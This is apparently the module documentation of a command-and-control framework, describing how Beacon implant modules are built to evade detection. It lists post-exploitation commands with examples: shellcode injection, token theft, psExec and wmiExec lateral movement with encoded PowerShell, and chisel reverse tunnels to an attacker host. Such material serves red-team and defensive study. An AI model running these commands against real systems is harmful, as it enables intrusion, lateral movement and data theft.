6 ‐ Modules
Modules are additional functionalities for the TeamServer and the Beacon. They are libraries loaded dynamically at runtime. On the Beacon side they never touch the disk.
They can be compiled 3 ways:
- Linux library .so for the TeamServer that are loaded by the TeamServer at start.
- Linux library .so for the Beacon that are loaded by the Beacon when send with the loadModule instruction. When compiled to this end they don't contain any static strings, and only the necessary functions.
- Windows library .dll for the Breacon that are loaded by the Beacon when send with the loadModule instruction. When compiled to this end they don't contain any static strings, and only the necessary functions.
The same files are compile in 3 different way to produce the 3 modules. For OPSEC reason modules are identified by name on the TeamServer side and by hash on the Beacon side. In the same fashion error are represented by integer Beacon side and the translation is done TeamServer side avoiding as much as possible static strings on the victime side.
Modules are classes inheriting from ModuleCmd that implement 5 members and export a constructor function named moduleNameConstuctor:
virtual int init(std::vector<std::string>& splitedCmd, C2Message& c2Message) = 0;
virtual int process(C2Message& c2Message, C2Message& c2RetMessage) = 0;
virtual int followUp(const C2Message &c2RetMessage) {return 0;};
virtual int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg) {return 0;};
virtual int recurringExec (C2Message& c2RetMessage) {return 0;};
init(std::vector<std::string>& splitedCmd, C2Message& c2Message)
Executed TeamServer side. Prepare the message send to the beacon. It can contain strings that are not embedded in the module send to the beacon when compiled in release mode.
int process(C2Message& c2Message, C2Message& c2RetMessage)
Executed in Beacon side. Performe the main functionalities, the result is store in RetMessage. It shouldn't contain any static strings, if an error occur it fills the errorCode of C2Message.
int followUp(const C2Message &c2RetMessage)
Executed TeamServer side in case their is some action to be taken after the execution (Beacon side) of the module. For exemple in the case of download, the followUp is in charge of saving the file into disk. It can be omitted if their is nothing to do for a specific module.
int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg)
Executed TeamServer side, translate any error code into the associated message to be send to the client.
int recurringExec (C2Message& c2RetMessage)
Executed Beacon side in the case where their is a recurring action to be taken. For exemple the KeyLogger send any additional key pressed to the TeamServer each time their is a new communication made from the Beacon to the TeamServer.
| Modules | Description |
|---|---|
| loadModule | Load module DLL file on the memory of the beacon, giving the beacon this capability. Load the DLL from the given path, if it's not found try the default ../Modules/ path.exemple: - loadModule /tools/PrintWorkingDirectory.dll |
| assemblyExec | Execute shellcode in a process (notepad.exe), wait for the end of execution or a timeout (120 sec). Retrieve the output. Use -r to use a shellcode file. If -e or -d are given, use donut to create the shellcode. exemple: - assemblyExec -r ./shellcode.bin - assemblyExec -e ./program.exe arg1 arg2... - assemblyExec -e ./Seatbelt.exe -group=system - assemblyExec -d ./test.dll method arg1 arg2... |
| upload | Upload a file from the attacker machine to the victime machine exemple: - upload c:\temp\toto.exe c:\temp\toto.exe |
| download | Download a file from victime machine to the attacker machine exemple: - download c:\temp\toto.exe c:\temp\toto.exe |
| run | Run new process on the system. If the cmd is a system cmd use the following syntax 'cmd /c command'. The beacon wait for the cmd to end and provide the output.' exemple: - run whoami - run cmd /c dir - run .\Seatbelt.exe -group=system |
| script | - |
| inject | Inject shellcode in the pid process. For linux must be root or at least have ptrace capability. No output is provided. Use -r to use a shellcode file. If -e or -d are given, use donut to create the shellcode. If pid is negative a new process is created for the injection. exemple: - inject -r ./calc.bin 2568 - inject -e ./beacon.exe pid arg1 arg2 - inject -d ./calc.dll pid method arg1 arg2 |
| pwd | PrintWorkingDirectory |
| cd | ChangeDirectory |
| ls | ListDirectory |
| ps | ListProcesses |
| makeToken | Create a token from user and password and impersonate it. exemple: - makeToken DOMAIN\Username Password |
| rev2self | Drop the impersonation of a token, created with makeToken exemple: - rev2self |
| stealToken | Steal a token and impersonate the it. You must have administrator privilege. exemple: - stealToken pid |
| coffLoader | Load a .o coff file and execute it. Coff take packed argument as entry, you get to specify the type as a string of [Z,z,s,i] for wstring, string, short, int. exemple: - coffLoader ./dir.x64.o go Zs c:\ 0 - coffLoader ./whoami.x64.o |
| powershell | Execute a powershell command. To be sure to get the output of the commande do 'cmd |
| kerberosUseTicket | Import a kerberos ticket from a file to the curent LUID. exemple: - KerberosUseTicket /tmp/ticket.kirbi |
| psExec | Create an exe on an SMB share of the victime and a service to launch this exec using system. The exe must be a service binary or inject into another process. You must have the right kerberos tickets. exemple: - psExec m3dc.cyber.local /tmp/implant.exe - psExec 10.9.20.10 /tmp/implant.exe |
| wmiExec | Execute a command through Windows Management Instrumentation (WMI). The user have to be administrator of the remote machine. Can be use with credentials or with kerberos authentication. To use with kerberos, the ticket must be in memory (use Rubeus). exemple: - wmiExec -u DOMAIN\Username Password target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV - wmiExec -k DOMAIN\dc target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV |
| spawnAs | Launch a new process as another user, with the given credentials. exemple: - spawnAs DOMAIN\Username Password powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgA... - spawnAs .\Administrator Password C:\Users\Public\Documents\implant.exe |
| chisel | Launch chisel in a thread on the remote server. No output is provided. exemple: - chisel status - chisel stop pid Reverse Socks Proxy: - chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:socks - On the attacking machine: chisel server -p LISTEN_PORT --reverse Remote Port Forward: - chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:REMOT_PORT - On the attacking machine: chisel server -p LISTEN_PORT --reverse |
| tree | Tree |
| socks | Start a socks5 server on the TeamServer and tunnel the traffic to the Beacon. The tunneling is done using the communication protocol of the beacon. Only one socks5 server can be opened at a time. exemple: - socks start 1080 - socks stop |